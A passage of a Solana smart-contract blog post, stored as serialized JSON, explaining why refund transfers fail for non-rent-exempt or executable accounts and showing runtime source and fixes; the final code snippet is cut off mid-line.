)?;\n+}\n",[72552],{"type":28,"tag":98,"props":72553,"children":72554},{"__ignoreMap":7},[72555,72563,72571,72579,72587,72595,72603,72611,72619,72627],{"type":28,"tag":116,"props":72556,"children":72557},{"class":245,"line":246},[72558],{"type":28,"tag":116,"props":72559,"children":72560},{"style":266},[72561],{"type":33,"value":72562},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n",{"type":28,"tag":116,"props":72564,"children":72565},{"class":245,"line":256},[72566],{"type":28,"tag":116,"props":72567,"children":72568},{"style":350},[72569],{"type":33,"value":72570},"+let rent = Rent::get()?;\n",{"type":28,"tag":116,"props":72572,"children":72573},{"class":245,"line":293},[72574],{"type":28,"tag":116,"props":72575,"children":72576},{"style":350},[72577],{"type":33,"value":72578},"+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n",{"type":28,"tag":116,"props":72580,"children":72581},{"class":245,"line":361},[72582],{"type":28,"tag":116,"props":72583,"children":72584},{"style":350},[72585],{"type":33,"value":72586},"+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n",{"type":28,"tag":116,"props":72588,"children":72589},{"class":245,"line":387},[72590],{"type":28,"tag":116,"props":72591,"children":72592},{"style":266},[72593],{"type":33,"value":72594},"    transfer_from_pda(\n",{"type":28,"tag":116,"props":72596,"children":72597},{"class":245,"line":400},[72598],{"type":28,"tag":116,"props":72599,"children":72600},{"style":266},[72601],{"type":33,"value":72602},"        &ctx.accounts.throne.to_account_info(),\n",{"type":28,"tag":116,"props":72604,"children":72605},{"class":245,"line":614},[72606],{"type":28,"tag":116,"props":72607,"children":72608},{"style":266},[72609],{"type":33,"value":72610},"        &ctx.accounts.old_king,\n",{"type":28,"tag":116,"props":72612,"children":72613},{"class":245,"line":631},[72614],{"type":28,"tag":116,"props":72615,"children":72616},{"style":266},[72617],{"type":33,"value":72618},"        to_reimburse,\n",{"type":28,"tag":116,"props":72620,"children":72621},{"class":245,"line":665},[72622],{"type":28,"tag":116,"props":72623,"children":72624},{"style":266},[72625],{"type":33,"value":72626},"    )?;\n",{"type":28,"tag":116,"props":72628,"children":72629},{"class":245,"line":713},[72630],{"type":28,"tag":116,"props":72631,"children":72632},{"style":350},[72633],{"type":33,"value":72634},"+}\n",{"type":28,"tag":29,"props":72636,"children":72637},{},[72638],{"type":33,"value":72639},"But is rent-exemption the only thing that can cause a lamport transfer to fail? Not quite.",{"type":28,"tag":75,"props":72641,"children":72643},{"id":72642},"bug-2-writable-but-untouchable-set_lamports-fails",[72644,72646,72652],{"type":33,"value":72645},"Bug 2: Writable but Untouchable — ",{"type":28,"tag":98,"props":72647,"children":72649},{"className":72648},[],[72650],{"type":33,"value":72651},"set_lamports",{"type":33,"value":72653}," Fails",{"type":28,"tag":29,"props":72655,"children":72656},{},[72657,72659,72666],{"type":33,"value":72658},"Let's look at ",{"type":28,"tag":87,"props":72660,"children":72663},{"href":72661,"rel":72662},"https://github.com/anza-xyz/agave/blob/f389dd23067e37d756c3f9d2f3d50e339dad7053/transaction-context/src/lib.rs#L863-L885",[91],[72664],{"type":33,"value":72665},"BorrowedAccount::set_lamports",{"type":33,"value":141},{"type":28,"tag":234,"props":72668,"children":72670},{"className":2652,"code":72669,"language":2651,"meta":7,"style":7},"/// Overwrites the number of lamports of this account (transaction wide)\n#[cfg(not(target_os = \"solana\"))]\npub fn set_lamports(&mut self, lamports: u64) -> Result\u003C(), InstructionError> {\n    // An account not owned by the program cannot have its balance decrease\n    if !self.is_owned_by_current_program() && lamports \u003C self.get_lamports() {\n        return Err(InstructionError::ExternalAccountLamportSpend);\n    }\n    // The balance of read-only may not change\n    if !self.is_writable() {\n        return Err(InstructionError::ReadonlyLamportChange);\n    }\n    // The balance of executable accounts may not change\n    if self.is_executable_internal() {\n        return Err(InstructionError::ExecutableLamportChange);\n    }\n    // don't touch the account if the lamports do not change\n    if self.get_lamports() == lamports {\n        return Ok(());\n    }\n    self.touch()?;\n    self.account.set_lamports(lamports);\n    Ok(())\n}\n\n/// Feature gating to remove `is_executable` flag related checks\n#[cfg(not(target_os = \"solana\"))]\n#[inline]\nfn is_executable_internal(&self) -> bool {\n    !self\n        .transaction_context\n        .remove_accounts_executable_flag_checks\n        && self.account.executable()\n}\n\n",[72671],{"type":28,"tag":98,"props":72672,"children":72673},{"__ignoreMap":7},[72674,72682,72703,72775,72783,72842,72874,72881,72889,72917,72949,72956,72964,72988,73020,73027,73035,73070,73086,73093,73121,73156,73167,73174,73181,73189,73208,73216,73256,73268,73280,73292,73323],{"type":28,"tag":116,"props":72675,"children":72676},{"class":245,"line":246},[72677],{"type":28,"tag":116,"props":72678,"children":72679},{"style":250},[72680],{"type":33,"value":72681},"/// Overwrites the number of lamports of this account (transaction wide)\n",{"type":28,"tag":116,"props":72683,"children":72684},{"class":245,"line":256},[72685,72690,72694,72699],{"type":28,"tag":116,"props":72686,"children":72687},{"style":266},[72688],{"type":33,"value":72689},"#[cfg(not(target_os ",{"type":28,"tag":116,"props":72691,"children":72692},{"style":370},[72693],{"type":33,"value":373},{"type":28,"tag":116,"props":72695,"children":72696},{"style":563},[72697],{"type":33,"value":72698}," \"solana\"",{"type":28,"tag":116,"props":72700,"children":72701},{"style":266},[72702],{"type":33,"value":20272},{"type":28,"tag":116,"props":72704,"children":72705},{"class":245,"line":293},[72706,72710,72714,72719,72723,72727,72731,72735,72739,72743,72747,72751,72755,72759,72763,72767,72771],{"type":28,"tag":116,"props":72707,"children":72708},{"style":376},[72709],{"type":33,"value":13356},{"type":28,"tag":116,"props":72711,"children":72712},{"style":376},[72713],{"type":33,"value":13361},{"type":28,"tag":116,"props":72715,"children":72716},{"style":282},[72717],{"type":33,"value":72718}," set_lamports",{"type":28,"tag":116,"props":72720,"children":72721},{"style":266},[72722],{"type":33,"value":313},{"type":28,"tag":116,"props":72724,"children":72725},{"style":370},[72726],{"type":33,"value":2780},{"type":28,"tag":116,"props":72728,"children":72729},{"style":376},[72730],{"type":33,"value":3394},{"type":28,"tag":116,"props":72732,"children":72733},{"style":376},[72734],{"type":33,"value":13463},{"type":28,"tag":116,"props":72736,"children":72737},{"style":266},[72738],{"type":33,"value":825},{"type":28,"tag":116,"props":72740,"children":72741},{"style":272},[72742],{"type":33,"value":15174},{"type":28,"tag":116,"props":72744,"children":72745},{"style":370},[72746],{"type":33,"value":4160},{"type":28,"tag":116,"props":72748,"children":72749},{"style":339},[72750],{"type":33,"value":5531},{"type":28,"tag":116,"props":72752,"children":72753},{"style":266},[72754],{"type":33,"value":1609},{"type":28,"tag":116,"props":72756,"children":72757},{"style":370},[72758],{"type":33,"value":13423},{"type":28,"tag":116,"props":72760,"children":72761},{"style":339},[72762],{"type":33,"value":13428},{"type":28,"tag":116,"props":72764,"children":72765},{"style":266},[72766],{"type":33,"value":13433},{"type":28,"tag":116,"props":72768,"children":72769},{"style":339},[72770],{"type":33,"value":15419},{"type":28,"tag":116,"props":72772,"children":72773},{"style":266},[72774],{"type":33,"value":6952},{"type":28,"tag":116,"props":72776,"children":72777},{"class":245,"line":361},[72778],{"type":28,"tag":116,"props":72779,"children":72780},{"style":250},[72781],{"type":33,"value":72782},"    // An account not owned by the program cannot have its balance decrease\n",{"type":28,"tag":116,"props":72784,"children":72785},{"class":245,"line":387},[72786,72790,72794,72798,72802,72807,72811,72816,72821,72825,72829,72833,72838],{"type":28,"tag":116,"props":72787,"children":72788},{"style":260},[72789],{"type":33,"value":11947},{"type":28,"tag":116,"props":72791,"children":72792},{"style":370},[72793],{"type":33,"value":12530},{"type":28,"tag":116,"props":72795,"children":72796},{"style":376},[72797],{"type":33,"value":13379},{"type":28,"tag":116,"props":72799,"children":72800},{"style":370},[72801],{"type":33,"value":141},{"type":28,"tag":116,"props":72803,"children":72804},{"style":282},[72805],{"type":33,"value":72806},"is_owned_by_current_program",{"type":28,"tag":116,"props":72808,"children":72809},{"style":266},[72810],{"type":33,"value":13709},{"type":28,"tag":116,"props":72812,"children":72813},{"style":370},[72814],{"type":33,"value":72815},"&&",{"type":28,"tag":116,"props":72817,"children":72818},{"style":272},[72819],{"type":33,"value":72820}," lamports",{"type":28,"tag":116,"props":72822,"children":72823},{"style":370},[72824],{"type":33,"value":8391},{"type":28,"tag":116,"props":72826,"children":72827},{"style":376},[72828],{"type":33,"value":13463},{"type":28,"tag":116,"props":72830,"children":72831},{"style":370},[72832],{"type":33,"value":141},{"type":28,"tag":116,"props":72834,"children":72835},{"style":282},[72836],{"type":33,"value":72837},"get_lamports",{"type":28,"tag":116,"props":72839,"children":72840},{"style":266},[72841],{"type":33,"value":1068},{"type":28,"tag":116,"props":72843,"children":72844},{"class":245,"line":400},[72845,72849,72853,72857,72861,72865,72870],{"type":28,"tag":116,"props":72846,"children":72847},{"style":260},[72848],{"type":33,"value":15405},{"type":28,"tag":116,"props":72850,"children":72851},{"style":339},[72852],{"type":33,"value":15410},{"type":28,"tag":116,"props":72854,"children":72855},{"style":266},[72856],{"type":33,"value":313},{"type":28,"tag":116,"props":72858,"children":72859},{"style":339},[72860],{"type":33,"value":15419},{"type":28,"tag":116,"props":72862,"children":72863},{"style":370},[72864],{"type":33,"value":3151},{"type":28,"tag":116,"props":72866,"children":72867},{"style":339},[72868],{"type":33,"value":72869},"ExternalAccountLamportSpend",{"type":28,"tag":116,"props":72871,"children":72872},{"style":266},[72873],{"type":33,"value":895},{"type":28,"tag":116,"props":72875,"children":72876},{"class":245,"line":614},[72877],{"type":28,"tag":116,"props":72878,"children":72879},{"style":266},[72880],{"type":33,"value":3025},{"type":28,"tag":116,"props":72882,"children":72883},{"class":245,"line":631},[72884],{"type":28,"tag":116,"props":72885,"children":72886},{"style":250},[72887],{"type":33,"value":72888},"    // The balance of read-only may not change\n",{"type":28,"tag":116,"props":72890,"children":72891},{"class":245,"line":665},[72892,72896,72900,72904,72908,72913],{"type":28,"tag":116,"props":72893,"children":72894},{"style":260},[72895],{"type":33,"value":11947},{"type":28,"tag":116,"props":72897,"children":72898},{"style":370},[72899],{"type":33,"value":12530},{"type":28,"tag":116,"props":72901,"children":72902},{"style":376},[72903],{"type":33,"value":13379},{"type":28,"tag":116,"props":72905,"children":72906},{"style":370},[72907],{"type":33,"value":141},{"type":28,"tag":116,"props":72909,"children":72910},{"style":282},[72911],{"type":33,"value":72912},"is_writable",{"type":28,"tag":116,"props":72914,"children":72915},{"style":266},[72916],{"type":33,"value":1068},{"type":28,"tag":116,"props":72918,"children":72919},{"class":245,"line":713},[72920,72924,72928,72932,72936,72940,72945],{"type":28,"tag":116,"props":72921,"children":72922},{"style":260},[72923],{"type":33,"value":15405},{"type":28,"tag":116,"props":72925,"children":72926},{"style":339},[72927],{"type":33,"value":15410},{"type":28,"tag":116,"props":72929,"children":72930},{"style":266},[72931],{"type":33,"value":313},{"type":28,"tag":116,"props":72933,"children":72934},{"style":339},[72935],{"type":33,"value":15419},{"type":28,"tag":116,"props":72937,"children":72938},{"style":370},[72939],{"type":33,"value":3151},{"type":28,"tag":116,"props":72941,"children":72942},{"style":339},[72943],{"type":33,"value":72944},"ReadonlyLamportChange",{"type":28,"tag":116,"props":72946,"children":72947},{"style":266},[72948],{"type":33,"value":895},{"type":28,"tag":116,"props":72950,"children":72951},{"class":245,"line":750},[72952],{"type":28,"tag":116,"props":72953,"children":72954},{"style":266},[72955],{"type":33,"value":3025},{"type":28,"tag":116,"props":72957,"children":72958},{"class":245,"line":779},[72959],{"type":28,"tag":116,"props":72960,"children":72961},{"style":250},[72962],{"type":33,"value":72963},"    // The balance of executable accounts may not change\n",{"type":28,"tag":116,"props":72965,"children":72966},{"class":245,"line":796},[72967,72971,72975,72979,72984],{"type":28,"tag":116,"props":72968,"children":72969},{"style":260},[72970],{"type":33,"value":11947},{"type":28,"tag":116,"props":72972,"children":72973},{"style":376},[72974],{"type":33,"value":13463},{"type":28,"tag":116,"props":72976,"children":72977},{"style":370},[72978],{"type":33,"value":141},{"type":28,"tag":116,"props":72980,"children":72981},{"style":282},[72982],{"type":33,"value":72983},"is_executable_internal",{"type":28,"tag":116,"props":72985,"children":72986},{"style":266},[72987],{"type":33,"value":1068},{"type":28,"tag":116,"props":72989,"children":72990},{"class":245,"line":847},[72991,72995,72999,73003,73007,73011,73016],{"type":28,"tag":116,"props":72992,"children":72993},{"style":260},[72994],{"type":33,"value":15405},{"type":28,"tag":116,"props":72996,"children":72997},{"style":339},[72998],{"type":33,"value":15410},{"type":28,"tag":116,"props":73000,"children":73001},{"style":266},[73002],{"type":33,"value":313},{"type":28,"tag":116,"props":73004,"children":73005},{"style":339},[73006],{"type":33,"value":15419},{"type":28,"tag":116,"props":73008,"children":73009},{"style":370},[73010],{"type":33,"value":3151},{"type":28,"tag":116,"props":73012,"children":73013},{"style":339},[73014],{"type":33,"value":73015},"ExecutableLamportChange",{"type":28,"tag":116,"props":73017,"children":73018},{"style":266},[73019],{"type":33,"value":895},{"type":28,"tag":116,"props":73021,"children":73022},{"class":245,"line":898},[73023],{"type":28,"tag":116,"props":73024,"children":73025},{"style":266},[73026],{"type":33,"value":3025},{"type":28,"tag":116,"props":73028,"children":73029},{"class":245,"line":907},[73030],{"type":28,"tag":116,"props":73031,"children":73032},{"style":250},[73033],{"type":33,"value":73034},"    // don't touch the account if the lamports do not change\n",{"type":28,"tag":116,"props":73036,"children":73037},{"class":245,"line":981},[73038,73042,73046,73050,73054,73058,73062,73066],{"type":28,"tag":116,"props":73039,"children":73040},{"style":260},[73041],{"type":33,"value":11947},{"type":28,"tag":116,"props":73043,"children":73044},{"style":376},[73045],{"type":33,"value":13463},{"type":28,"tag":116,"props":73047,"children":73048},{"style":370},[73049],{"type":33,"value":141},{"type":28,"tag":116,"props":73051,"children":73052},{"style":282},[73053],{"type":33,"value":72837},{"type":28,"tag":116,"props":73055,"children":73056},{"style":266},[73057],{"type":33,"value":13709},{"type":28,"tag":116,"props":73059,"children":73060},{"style":370},[73061],{"type":33,"value":2340},{"type":28,"tag":116,"props":73063,"children":73064},{"style":272},[73065],{"type":33,"value":72820},{"type":28,"tag":116,"props":73067,"children":73068},{"style":266},[73069],{"type":33,"value":1291},{"type":28,"tag":116,"props":73071,"children":73072},{"class":245,"line":1011},[73073,73077,73081],{"type":28,"tag":116,"props":73074,"children":73075},{"style":260},[73076],{"type":33,"value":15405},{"type":28,"tag":116,"props":73078,"children":73079},{"style":339},[73080],{"type":33,"value":42558},{"type":28,"tag":116,"props":73082,"children":73083},{"style":266},[73084],{"type":33,"value":73085},"(());\n",{"type":28,"tag":116,"props":73087,"children":73088},{"class":245,"line":1029},[73089],{"type":28,"tag":116,"props":73090,"children":73091},{"style":266},[73092],{"type":33,"value":3025},{"type":28,"tag":116,"props":73094,"children":73095},{"class":245,"line":1038},[73096,73100,73104,73109,73113,73117],{"type":28,"tag":116,"props":73097,"children":73098},{"style":376},[73099],{"type":33,"value":20449},{"type":28,"tag":116,"props":73101,"children":73102},{"style":370},[73103],{"type":33,"value":141},{"type":28,"tag":116,"props":73105,"children":73106},{"style":282},[73107],{"type":33,"value":73108},"touch",{"type":28,"tag":116,"props":73110,"children":73111},{"style":266},[73112],{"type":33,"value":13545},{"type":28,"tag":116,"props":73114,"children":73115},{"style":370},[73116],{"type":33,"value":2825},{"type":28,"tag":116,"props":73118,"children":73119},{"style":266},[73120],{"type":33,"value":384},{"type":28,"tag":116,"props":73122,"children":73123},{"class":245,"line":1047},[73124,73128,73132,73136,73140,73144,73148,73152],{"type":28,"tag":116,"props":73125,"children":73126},{"style":376},[73127],{"type":33,"value":20449},{"type":28,"tag":116,"props":73129,"children":73130},{"style":370},[73131],{"type":33,"value":141},{"type":28,"tag":116,"props":73133,"children":73134},{"style":266},[73135],{"type":33,"value":12619},{"type":28,"tag":116,"props":73137,"children":73138},{"style":370},[73139],{"type":33,"value":141},{"type":28,"tag":116,"props":73141,"children":73142},{"style":282},[73143],{"type":33,"value":72651},{"type":28,"tag":116,"props":73145,"children":73146},{"style":266},[73147],{"type":33,"value":313},{"type":28,"tag":116,"props":73149,"children":73150},{"style":272},[73151],{"type":33,"value":15174},{"type":28,"tag":116,"props":73153,"children":73154},{"style":266},[73155],{"type":33,"value":895},{"type":28,"tag":116,"props":73157,"children":73158},{"class":245,"line":1071},[73159,73163],{"type":28,"tag":116,"props":73160,"children":73161},{"style":339},[73162],{"type":33,"value":13999},{"type":28,"tag":116,"props":73164,"children":73165},{"style":266},[73166],{"type":33,"value":14004},{"type":28,"tag":116,"props":73168,"children":73169},{"class":245,"line":1137},[73170],{"type":28,"tag":116,"props":73171,"children":73172},{"style":266},[73173],{"type":33,"value":406},{"type":28,"tag":116,"props":73175,"children":73176},{"class":245,"line":1181},[73177],{"type":28,"tag":116,"props":73178,"children":73179},{"emptyLinePlaceholder":19},[73180],{"type":33,"value":1044},{"type":28,"tag":116,"props":73182,"children":73183},{"class":245,"line":1212},[73184],{"type":28,"tag":116,"props":73185,"children":73186},{"style":250},[73187],{"type":33,"value":73188},"/// Feature gating to remove `is_executable` flag related checks\n",{"type":28,"tag":116,"props":73190,"children":73191},{"class":245,"line":1254},[73192,73196,73200,73204],{"type":28,"tag":116,"props":73193,"children":73194},{"style":266},[73195],{"type":33,"value":72689},{"type":28,"tag":116,"props":73197,"children":73198},{"style":370},[73199],{"type":33,"value":373},{"type":28,"tag":116,"props":73201,"children":73202},{"style":563},[73203],{"type":33,"value":72698},{"type":28,"tag":116,"props":73205,"children":73206},{"style":266},[73207],{"type":33,"value":20272},{"type":28,"tag":116,"props":73209,"children":73210},{"class":245,"line":1262},[73211],{"type":28,"tag":116,"props":73212,"children":73213},{"style":266},[73214],{"type":33,"value":73215},"#[inline]\n",{"type":28,"tag":116,"props":73217,"children":73218},{"class":245,"line":1294},[73219,73223,73228,73232,73236,73240,73244,73248,73252],{"type":28,"tag":116,"props":73220,"children":73221},{"style":376},[73222],{"type":33,"value":19930},{"type":28,"tag":116,"props":73224,"children":73225},{"style":282},[73226],{"type":33,"value":73227}," is_executable_internal",{"type":28,"tag":116,"props":73229,"children":73230},{"style":266},[73231],{"type":33,"value":313},{"type":28,"tag":116,"props":73233,"children":73234},{"style":370},[73235],{"type":33,"value":2780},{"type":28,"tag":116,"props":73237,"children":73238},{"style":376},[73239],{"type":33,"value":13379},{"type":28,"tag":116,"props":73241,"children":73242},{"style":266},[73243],{"type":33,"value":1609},{"type":28,"tag":116,"props":73245,"children":73246},{"style":370},[73247],{"type":33,"value":13423},{"type":28,"tag":116,"props":73249,"children":73250},{"style":339},[73251],{"type":33,"value":11718},{"type":28,"tag":116,"props":73253,"children":73254},{"style":266},[73255],{"type":33,"value":1291},{"type":28,"tag":116,"props":73257,"children":73258},{"class":245,"line":1334},[73259,73263],{"type":28,"tag":116,"props":73260,"children":73261},{"style":370},[73262],{"type":33,"value":20633},{"type":28,"tag":116,"props":73264,"children":73265},{"style":376},[73266],{"type":33,"value":73267},"self\n",{"type":28,"tag":116,"props":73269,"children":73270},{"class":245,"line":1372},[73271,73275],{"type":28,"tag":116,"props":73272,"children":73273},{"style":370},[73274],{"type":33,"value":67880},{"type":28,"tag":116,"props":73276,"children":73277},{"style":266},[73278],{"type":33,"value":73279},"transaction_context\n",{"type":28,"tag":116,"props":73281,"children":73282},{"class":245,"line":1381},[73283,73287],{"type":28,"tag":116,"props":73284,"children":73285},{"style":370},[73286],{"type":33,"value":67880},{"type":28,"tag":116,"props":73288,"children":73289},{"style":266},[73290],{"type":33,"value":73291},"remove_accounts_executable_flag_checks\n",{"type":28,"tag":116,"props":73293,"children":73294},{"class":245,"line":1389},[73295,73299,73303,73307,73311,73315,73319],{"type":28,"tag":116,"props":73296,"children":73297},{"style":370},[73298],{"type":33,"value":42422},{"type":28,"tag":116,"props":73300,"children":73301},{"style":376},[73302],{"type":33,"value":13463},{"type":28,"tag":116,"props":73304,"children":73305},{"style":370},[73306],{"type":33,"value":141},{"type":28,"tag":116,"props":73308,"children":73309},{"style":266},[73310],{"type":33,"value":12619},{"type":28,"tag":116,"props":73312,"children":73313},{"style":370},[73314],{"type":33,"value":141},{"type":28,"tag":116,"props":73316,"children":73317},{"style":282},[73318],{"type":33,"value":15317},{"type":28,"tag":116,"props":73320,"children":73321},{"style":266},[73322],{"type":33,"value":7407},{"type":28,"tag":116,"props":73324,"children":73325},{"class":245,"line":1425},[73326],{"type":28,"tag":116,"props":73327,"children":73328},{"style":266},[73329],{"type":33,"value":406},{"type":28,"tag":29,"props":73331,"children":73332},{},[73333],{"type":33,"value":73334},"Turns out: even writable, rent-exempt accounts can still reject lamport transfers.",{"type":28,"tag":29,"props":73336,"children":73337},{},[73338,73340,73345],{"type":33,"value":73339},"Specifically, ",{"type":28,"tag":4995,"props":73341,"children":73342},{},[73343],{"type":33,"value":73344},"executable accounts",{"type":33,"value":73346}," cannot receive or send lamports — the runtime treats them as immutable.",{"type":28,"tag":443,"props":73348,"children":73350},{"id":73349},"sidebar-whats-the-executable-flag-anyway",[73351],{"type":33,"value":73352},"Sidebar: What's the executable Flag Anyway?",{"type":28,"tag":29,"props":73354,"children":73355},{},[73356,73357,73362],{"type":33,"value":16275},{"type":28,"tag":98,"props":73358,"children":73360},{"className":73359},[],[73361],{"type":33,"value":15317},{"type":33,"value":73363}," flag is a legacy mechanism marking accounts that hold program code. Historically, an account with this flag was assumed to either contain immutable BPF bytecode or was a proxy to a built-in program, and therefore it made sense to consider it read-only for performance reasons.",{"type":28,"tag":29,"props":73365,"children":73366},{},[73367,73369,73374],{"type":33,"value":73368},"This behavior became problematic with the introduction of the ",{"type":28,"tag":4995,"props":73370,"children":73371},{},[73372],{"type":33,"value":73373},"Upgradeable BPF Loader",{"type":33,"value":73375},". A workaround was used to maintain compatibility with the existing runtime logic. The program data containing bpf bytecode was split into a separate account, ProgramData, with the program account now only containing an address pointing to the ProgramData account:",{"type":28,"tag":234,"props":73377,"children":73379},{"className":2652,"code":73378,"language":2651,"meta":7,"style":7},"Program {\n    /// Address of the ProgramData account.\n    programdata_address: Pubkey,\n},\nProgramData {\n    /// Slot that the program was last modified.\n    slot: u64,\n    /// Address of the Program's upgrade authority.\n    upgrade_authority_address: Option\u003CPubkey>,\n    // The raw program data follows this serialized structure in the\n    // account's data.\n},\n",[73380],{"type":28,"tag":98,"props":73381,"children":73382},{"__ignoreMap":7},[73383,73395,73403,73423,73431,73443,73451,73471,73479,73507,73515,73523],{"type":28,"tag":116,"props":73384,"children":73385},{"class":245,"line":246},[73386,73391],{"type":28,"tag":116,"props":73387,"children":73388},{"style":339},[73389],{"type":33,"value":73390},"Program",{"type":28,"tag":116,"props":73392,"children":73393},{"style":266},[73394],{"type":33,"value":1291},{"type":28,"tag":116,"props":73396,"children":73397},{"class":245,"line":256},[73398],{"type":28,"tag":116,"props":73399,"children":73400},{"style":250},[73401],{"type":33,"value":73402},"    /// Address of the ProgramData account.\n",{"type":28,"tag":116,"props":73404,"children":73405},{"class":245,"line":293},[73406,73411,73415,73419],{"type":28,"tag":116,"props":73407,"children":73408},{"style":272},[73409],{"type":33,"value":73410},"    programdata_address",{"type":28,"tag":116,"props":73412,"children":73413},{"style":370},[73414],{"type":33,"value":4160},{"type":28,"tag":116,"props":73416,"children":73417},{"style":339},[73418],{"type":33,"value":20520},{"type":28,"tag":116,"props":73420,"children":73421},{"style":266},[73422],{"type":33,"value":3178},{"type":28,"tag":116,"props":73424,"children":73425},{"class":245,"line":361},[73426],{"type":28,"tag":116,"props":73427,"children":73428},{"style":266},[73429],{"type":33,"value":73430},"},\n",{"type":28,"tag":116,"props":73432,"children":73433},{"class":245,"line":387},[73434,73439],{"type":28,"tag":116,"props":73435,"children":73436},{"style":339},[73437],{"type":33,"value":73438},"ProgramData",{"type":28,"tag":116,"props":73440,"children":73441},{"style":266},[73442],{"type":33,"value":1291},{"type":28,"tag":116,"props":73444,"children":73445},{"class":245,"line":400},[73446],{"type":28,"tag":116,"props":73447,"children":73448},{"style":250},[73449],{"type":33,"value":73450},"    /// Slot that the program was last modified.\n",{"type":28,"tag":116,"props":73452,"children":73453},{"class":245,"line":614},[73454,73459,73463,73467],{"type":28,"tag":116,"props":73455,"children":73456},{"style":272},[73457],{"type":33,"value":73458},"    slot",{"type":28,"tag":116,"props":73460,"children":73461},{"style":370},[73462],{"type":33,"value":4160},{"type":28,"tag":116,"props":73464,"children":73465},{"style":339},[73466],{"type":33,"value":5531},{"type":28,"tag":116,"props":73468,"children":73469},{"style":266},[73470],{"type":33,"value":3178},{"type":28,"tag":116,"props":73472,"children":73473},{"class":245,"line":631},[73474],{"type":28,"tag":116,"props":73475,"children":73476},{"style":250},[73477],{"type":33,"value":73478},"    /// Address of the Program's upgrade authority.\n",{"type":28,"tag":116,"props":73480,"children":73481},{"class":245,"line":665},[73482,73487,73491,73495,73499,73503],{"type":28,"tag":116,"props":73483,"children":73484},{"style":272},[73485],{"type":33,"value":73486},"    upgrade_authority_address",{"type":28,"tag":116,"props":73488,"children":73489},{"style":370},[73490],{"type":33,"value":4160},{"type":28,"tag":116,"props":73492,"children":73493},{"style":339},[73494],{"type":33,"value":27301},{"type":28,"tag":116,"props":73496,"children":73497},{"style":266},[73498],{"type":33,"value":514},{"type":28,"tag":116,"props":73500,"children":73501},{"style":339},[73502],{"type":33,"value":21061},{"type":28,"tag":116,"props":73504,"children":73505},{"style":266},[73506],{"type":33,"value":5809},{"type":28,"tag":116,"props":73508,"children":73509},{"class":245,"line":713},[73510],{"type":28,"tag":116,"props":73511,"children":73512},{"style":250},[73513],{"type":33,"value":73514},"    // The raw program data follows this serialized structure in the\n",{"type":28,"tag":116,"props":73516,"children":73517},{"class":245,"line":750},[73518],{"type":28,"tag":116,"props":73519,"children":73520},{"style":250},[73521],{"type":33,"value":73522},"    // account's data.\n",{"type":28,"tag":116,"props":73524,"children":73525},{"class":245,"line":779},[73526],{"type":28,"tag":116,"props":73527,"children":73528},{"style":266},[73529],{"type":33,"value":73430},{"type":28,"tag":29,"props":73531,"children":73532},{},[73533,73535,73542],{"type":33,"value":73534},"Eventually, the executable flag will be removed entirely as proposed in ",{"type":28,"tag":87,"props":73536,"children":73539},{"href":73537,"rel":73538},"https://github.com/solana-foundation/solana-improvement-documents/blob/main/proposals/0162-remove-accounts-executable-flag-checks.md",[91],[73540],{"type":33,"value":73541},"SIMD-0162",{"type":33,"value":73543},". The reasoning is simple: an account's owner and its content are sufficient to determine if it's a valid program — the executable flag is redundant.",{"type":28,"tag":29,"props":73545,"children":73546},{},[73547,73549,73554,73556,73561],{"type":33,"value":73548},"This change is also a ",{"type":28,"tag":4995,"props":73550,"children":73551},{},[73552],{"type":33,"value":73553},"hard requirement for supporting the new loader-v4",{"type":33,"value":73555},". Unlike the upgradable loader, which relies on a separate ",{"type":28,"tag":98,"props":73557,"children":73559},{"className":73558},[],[73560],{"type":33,"value":73438},{"type":33,"value":73562}," proxy account, loader-v4 stores all program data directly in the program account itself.",{"type":28,"tag":29,"props":73564,"children":73565},{},[73566,73568,73575,73577,73582],{"type":33,"value":73567},"As a result, it becomes impossible to modify the account's size after deployment, or to ",{"type":28,"tag":87,"props":73569,"children":73572},{"href":73570,"rel":73571},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/programs/bpf_loader/src/lib.rs#L1411",[91],[73573],{"type":33,"value":73574},"migrate",{"type":33,"value":73576}," from the upgradable loader to loader-v4 — without hitting the ",{"type":28,"tag":98,"props":73578,"children":73580},{"className":73579},[],[73581],{"type":33,"value":73015},{"type":33,"value":73583}," restriction.",{"type":28,"tag":443,"props":73585,"children":73587},{"id":73586},"fix-2-reject-program-accounts",[73588],{"type":33,"value":73589},"Fix 2: Reject Program Accounts",{"type":28,"tag":29,"props":73591,"children":73592},{},[73593],{"type":33,"value":73594},"To avoid this footgun, let’s explicitly skip any executable account:",{"type":28,"tag":234,"props":73596,"children":73598},{"className":2652,"code":73597,"language":2651,"meta":7,"style":7},"pub fn can_transfer_lamports(account: &AccountInfo, lamports: u64) -> Result\u003Cbool> {\nfn is_program(account: &AccountInfo) -> bool {\n    account.executable\n}\nlet rent = Rent::get()?;\nlet balance_after = account.lamports() + lamports;\nOk(account.is_writable\n    && rent.is_exempt(balance_after, account.data_len())\n    && !is_program(account))\n}\n",[73599],{"type":28,"tag":98,"props":73600,"children":73601},{"__ignoreMap":7},[73602,73678,73726,73742,73749,73788,73832,73856,73905,73933],{"type":28,"tag":116,"props":73603,"children":73604},{"class":245,"line":246},[73605,73609,73613,73618,73622,73626,73630,73634,73638,73642,73646,73650,73654,73658,73662,73666,73670,73674],{"type":28,"tag":116,"props":73606,"children":73607},{"style":376},[73608],{"type":33,"value":13356},{"type":28,"tag":116,"props":73610,"children":73611},{"style":376},[73612],{"type":33,"value":13361},{"type":28,"tag":116,"props":73614,"children":73615},{"style":282},[73616],{"type":33,"value":73617}," 